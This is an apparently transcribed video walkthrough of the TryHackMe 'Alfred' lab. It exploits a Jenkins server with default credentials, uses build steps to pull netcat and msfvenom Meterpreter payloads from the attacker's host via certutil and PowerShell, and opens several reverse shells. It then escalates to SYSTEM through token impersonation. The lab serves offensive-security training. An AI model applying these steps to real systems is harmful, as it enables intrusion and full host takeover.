What's going on? Welcome back. In today's video, we're going to do Alfred from TryHackMe. The machine is part of the offensive security pathway. And by the way, I have started this pathway. If you click here, we're going to do all of the rooms of the offensive security pen testing pathway. And by the way, I figured out that some of them had already been marked as done since I have done them before. These ones are the Active Directory rooms. So basically what I did here, guys, let me show you the playlist. I organized a playlist that contains the playlists of the offensive security. So basically here in this playlist, TryHackMe OSCP pathway, it contains all of the videos that I have done before enrolling in this pathway. So these include the TryHackMe Kinobi, TryHackMe Steel Mountain, TryHackMe Daily Bugle, TryHackMe Eternal Blue. These machines or these videos are part of the OSCP pathway that I have just started. And as you can see, always the Active Directory ones, I'm going to include them in this playlist. All right. And everything new or everything we do later, including the rooms that I haven't started before, I'm going to add them to this playlist. All right. Okay. So let's get started. So what do we have here? We have a machine, okay? Alfred machine contains or has 3 open ports. Let me get down here. So 80, 3389, 80, 80. And obviously 80 and 80 are our web servers. Here we have a remote desktop, but it is marked as TCP wrapped since the remote host has not responded with the packets. So it is open. The TCP handshake has been completed, but it didn't respond with any data, right? That's why it is TCP wrapped. But it's clear that 3389 is the remote desktop. So what do we do first? We try to navigate and find out what is on the web server. All right, so here we go. Let's find out first on port 80 what do we have. So basically, we have a pic of this celebrity and basic page. But if you navigate to F8, we will have a kind of admin panel for the Jenkins server. And we have done before some videos about Jenkins server, the exploitation, and how to gain reverse shell after gaining administrative access to the control panel of a Jenkins. And Jenkins is software development and automation. It's kind of software development and automation to automate the deployment of the code. So basically, it's for software developers and engineers. But in this video, we're going to try to gain access and exploit this. So basically, the first thing we try before just going around brute forcing, we try admin, and it's going to work. So that's the first the default credentials on a key asset on this machine, which is the Jenkins server. Okay, we have gained access. Now, the next thing is to, as you know, getting reverse shell. Now, basically, we have done some exploitation of Jenkins server in the past. I'm going to put the videos that refer to the Jenkins exploitation in the video cards. So, how do we do that? One way to do that is to find an existing project or create a new one. We have an existing project. We click on that. We have here. Okay, let's click on build now. Build scheduled, no, workspaces. Let's get back. Configure, we're going to click on configure and find a way to execute shell script, a script. So what do we have here? How to do that? So basically here we have the settings for the build. Now, as you can see in the build here, we can execute commands. And the kind of commands that work with Jenkins are regular commands, Windows commands, and PowerShell. We're going to demonstrate how to get a reverse shell with PowerShell and without PowerShell, and eventually with Metasploit and without Metasploit. So it's going to be all in one, all of the ways to gain a reverse shell. So source code management, no need to do that. So here we have the box here. So what do we do? Let's try first a regular method. Execute system commands without PowerShell. Okay. Now, the first method will rely on getting Jenkins server to download Netcat from my machine and execute it on the remote host. So the first thing to do that, we're going to have to head back, and from here we will make sure that Netcat is ready. So let's head to Windows binaries and move Netcat to the desktop. So cd user share Windows binaries, and let's list what's in there. Windows resources. So what do we have? Binaries, Netcat. Now, what's going to happen? We're going to cp Netcat here, and move it to desktop. So we have Netcat over here. Now, next, to open a web server, great. Let's head back and execute the command here. Since we are dealing with Windows, we're going to use certutil to download the tool Netcat from my machine. Certutil dash, okay, tel dash URL cache dash f http. Jesus Christ, I don't learn. Config. And of course, 8000 here nc.exe, and we're going to save that. In temp. The backslash is not working. Just a second. So where to put this one? I'm going to put that in temp nc.exe. And let's execute that. I'm going to hit on save. And then we're going to get back to the project. Drop down, build now. Done. Let's see. So it's being executed. Let's check the terminal. So as you can see, Netcat has been requested. Now, the next thing is to open a listener. And here it's going to be the new tab. In this tab, we're going to have many listeners, right? Netcat listener, PowerShell listener, Metasploit listener, all of them in one terminal. So at first, we're going to start with Netcat 4545, and we're going to reconfigure the project to, instead of, just change the command and run Netcat. So we're going to connect to my machine in the next command. All I have to do is to replace this or delete that and point to our IP address 445-e cmd.exe, and the listener is ready. Let's execute this. Apply, build now. So that's the first reverse shell. So who am I? No, who am I? Alfred Bruce. So that's the first way to get the reverse shell. All right. Now, of course, let me split this window into 4 windows. First one, and of course, one more. And here we're going to do 1. Okay. Why 4? For here we're going to have this reverse shell with Netcat, right? On the left or on the right, I'm going to create a payload with Metasploit and get a Meterpreter reverse shell. Now, here on the left, as you can see down to the left, we will have a reverse shell with PowerShell. And of course, we're going to leave the reverse shell with PowerShell and get another Meterpreter shell here. So Meterpreter with Netcat, Meterpreter with PowerShell. It's your choice to choose. Now, what's next? Sudo msf venom dash now next sudo msf venom. All right, dash p windows Meterpreter reverse TCP. Next dash a, the architecture is x86, and we're going to specify an encoder. It's your choice, you can specify the encoder or not, but it depends on the scenario. So this is a hypothetical scenario. It's not real, so we're not going to be scrutinizing every payload, as we know right beforehand that there is no firewall, there is no antivirus on the target. So x86, and we use Shikata. All right, lhost. Lport 4546 -f exe -o. The file name would be something like Alfred MSF or Meter v1. So the payload is ready, and as you can see, the web server is already running. So we're going to have to switch back here, go to the project, and download the current script. The I don't know why script just sticks to my tongue. Download the configure, and here we download the payload. Okay. So now we're going to type cert util -exe -url cache Alfred Meter v1, and save that to also temp. Okay, let's make sure there is no errors in the command. Alfred Meter v1, and the file name is correct. Web server is running. All right, let's copy this command, save. Seems like we still have one running. Okay, build now. Oh, so we have one. As you can see, we can't build the project here. Since we have the listener on the second build and it's still waiting, connecting to my machine, so we can't run the third build here. Okay. So instead, we're going to do that from the shell we already have. So let's close the browser or cancel this build one. Click on X. Okay. You don't want to respond, it's your choice. All right. So here we type dir, all right, the command, and we download Alfred Meter v1 to the machine. So now it's being downloaded. And now let's execute that. Oh, before sudo, let's run ms console and set up the listener. So use exploit multi-handler set payload windows host set import 4546, right? Yeah, 4546. Anything else? Nope. Run. So Meterpreter listener is ready and running. Let's now execute the payload. And here's the second Meterpreter shell. ID, get UID. So now we have two reverse shells, one with Meterpreter, okay, if you want to just work with Metasploit, and one without Meterpreter. Now, what's the next method in getting reverse shell? So we can use PowerShell, okay? Now, to use PowerShell, we will have to download a proper payload, right? Proper reverse shell to connect back to our machine. So basically, we can use Nishank PowerShell script. So this is a PowerShell, reverse shell. We can use that. Let's download this one, or let's copy it to my machine. Take all of that. Get back. So here, okay, this is fine. Now here I'm going to create a payload. Sudo name it Alfred PowerShell. And paste this one. And let's see what we have to change here. Right, we have to find the IP and port. خرا الرايت اب. Okay, I think we're gonna have to do that in the when invoking the command. So this is fine. Keep it as it is. Save it. Okay. Now let's go to since we can't use the build here, since there is one in progress, we can't use that. We can't build another one. So we're gonna use one of the reversals we have, turn this into PowerShell. Okay, for how long are we gonna have to wait? I guess we lost it, unfortunately. This happens all the time. Cancel the build, get back here, configure. Here, I'm gonna execute netcat one more time. Seems like I can't cancel this one. Okay, here's the reverse one more time, but we have this one died. Uh, get your ID, run. I'm looking to execute this. Or I'm going to use the PowerShell module of Meterpreter. Load PowerShell. And now what we're going to have to do, we're going to have to pass a command to download the tool from my machine. I'm going to execute this from the netcat reversal. So as you can see now, we received the third shell, which is PowerShell. So 1, 2, 3. Okay, what's next? The next thing is to, again, use Meterpreter, right, to create a listener for a payload, right, that we will download it with PowerShell. The thing is, you're doing the same thing, right, guys? But the bottom line is, here we are using PowerShell, and here we are using Netcat. That's the thing. We can use. You don't need to do all of this. This is all for demonstration purposes. You can use the Netcat method, or you can use the PowerShell method. Okay. So this is stuck here, I guess. All right. Okay, so here's sudo msfvenom -p windows meterpreter reverse p -a x86. dash what else? Dash encoder. Lhost. The thing I hate the most is the lhost part. L port should be 4548-F exe-o Alfred PSH ex.exe. Now the payload is ready. Okay, next, MSF cancel. Use exploit multi handler payload Windows Meterpreter reverse the part that I hate, lhosts. Run. Okay, what's next? Next, we're gonna have to download the payload. Which one? Alfred. We're gonna do that from the PowerShell here, but I guess I like to do this from the Netcat reverse shell since I need this to be intact. Nope. Okay. So here from Metasploit, drop the shell, and from here, PowerShell invoke expression, new object. Thing is, I don't have the command ready, so I'm relying on my bad memory. I guess there are some mistakes in the command. Download file, and then we specify the URL. And again, the part that I hate, grabbing the IP address. Alfred psh.ex.exe. Close the single quote, and then we're going to have to define the output name of the file, Alfred psh.ex.exe. Let's close the single quote. And here, how many double quotes do we have now? One. I guess we only have one here. So close that one and enter. So it's being downloaded. But we get an error here. dir. So this is the payload. Okay, fine. Now PowerShell start process, and the name of the payload is Alfred psh.ex.exe. I think this one failed. EX, I guess, not exe. So here, PowerShell start process, Alfred ESHEX.exe. Come on, double quotes. Look, now I can't do anything for this double quotes. I hate this. Okay, I got this. ESHEX.exe. And we received the fourth reversal. So how many reversal do we have now? 4, right? Okay. Apparently, we're gonna leave the upper ones hanging since they are connecting, and we're gonna work with the PowerShell ones for the next stage. The next stage is to conduct the privilege escalation. So the privilege escalation of this challenge relies on exploiting the Windows tokens. So basically, when TryHackMe has put some great introduction about the Windows tokens and how they work, how to exploit them. So the bottom line is, I have used this method before when I used to do Cybersecurity Labs machines. It's all about listing the tokens and doing token impersonation. We can do that with Meterpreter, and we can do that manually. The fast way is to do that with Meterpreter since the module is available, but with the manual method here, we're going to have to download the tool and execute it. So let's do the fast one first, and then we deal with the slow one. Look. But the question that raises itself is how to know that we're going to have to do Windows tokens impersonation. So basically, on the left or on the right, we type shell, and we see the current privileges of the current user. As you can see, once you see, where was this? Okay. So C impersonate privilege, right? If you see this, or C debug privilege, or if you see the load driver privilege, it means that the current user can impersonate the administrator tokens or other users' tokens. Okay, now let's head back to Meterpreter, okay, and type load incognito. So let's the next step is to know what are the tokens that we can impersonate. So we type list tokens dash G. So impersonate tokens available, the tokens available, and here we have the delegation. So there's a difference between delegation and the impersonation in Windows tokens. The delegation gives the user who is trying to impersonate, right, or do Windows token impersonation, gives him or gives her, gives it, whatever you would like, full access to the user or the service. While impersonation gives only the level of access to resources, but it doesn't give all the privileges of the service or the user. So we're going to choose the delegation method. As you can see, the thing we're looking for is here, bulletin administrator. Okay, so it's pretty clear what we're going to have to do next. So get down, or let's copy that first, and impersonate it. Impersonate token, and type in the target user that you want to impersonate. I am wondering how, oh, I have to escape this. Okay, let's do this. And here, you're gonna have to type 2. So successful impersonated user entity authority system. Let's see who we are, get UID. And we are net authority system. So we have successfully elevated your privileges. Okay. Now to make sure that we don't lose access, we're gonna have to migrate or see a process that is run under the administrator and migrate to that process, right? Because the original process we have, the Meterpreter 1, was under Alfred. Okay, so let's migrate to a more privileged process. We can do that EPS, and let's look for services. Since the services process, most of the time, is run under a privileged account. So we have this one, services running under net authority system. So all we have to do is to migrate to 668. Fine. The next thing is to get the flag. So shell. Now the flag exists in the config directory. Cd config. Dir. The flag is here. Cat no. Type root. And this is the flag. So grab this and get back TryHackMe. You can answer the questions, no worries about these questions. So we're going to get down, put the flag, submit, and correct. So this is the Meterpreter method. You may not have access or you may not be allowed to use Meterpreter, so we're going to have to switch to the manual method. Okay. So for the manual method, we can just do the same and download the tool manually. So we can just download the tool from here. I'm sorry guys, I just closed the terminal by mistake and everything has gone. So, but I'm very sorry guys, I closed the terminal by mistake, everything has gone, but thankfully I did this, the stupid thing after we have got the administrative access, so no problem. I'm gonna just now head back to the TryHackMe and answer the questions. Thankfully, I have finished this before the accidental close-up happened. Okay, so how many ports were open? I remember we had 3 ports. What's the username and password for the login panel? If you remember, they were admin for the Jenkins. What's the user flag? Oh, the user flag. The user flag, we need to get access again. I don't think it's hard to do that, right? Let me get back here. Close this one. Okay, dashboard, configure. Yep, available. All right, so here nc-lvp, I think also I lost the connection. Five. Has my IP changed? No. All right. Let me generate the connection now for the sake of getting the root flag. Oh. We are not connected? No? We are connected. Anyway, I'm not going to waste time on this, guys. So since we have elevated the privileges, we can easily just grab the user flag. It's not the end of the world. All right, let me proceed with the rest of the question. Expired, that's why. This machine was painful, pain. The experience was pain. I'm going to deploy this again. Okay. All right. Let me continue here. Switch shells. What's the final size of the exe payload that you generated? Okay, let's see that. CV desktop. The payload was Alfred something. This one, I guess, or yeah. So this is the size. All right. Next, privilege escalation. Completed. To which tokens are available? Enter the list tokens-G. We can see that the bulletin administrator token is available. Use the impersonate token. We did that. What's the output when you run? So what's the output when you run the getUID command? Again, we're gonna have to reestablish the session again. Finally, let's go back. CD Bruce dir, and the user flag is in the desktop, I guess. CD desktop dir type user.txt. Well, easy room, but painful machine when it comes to stability and response. So, see you in the next video.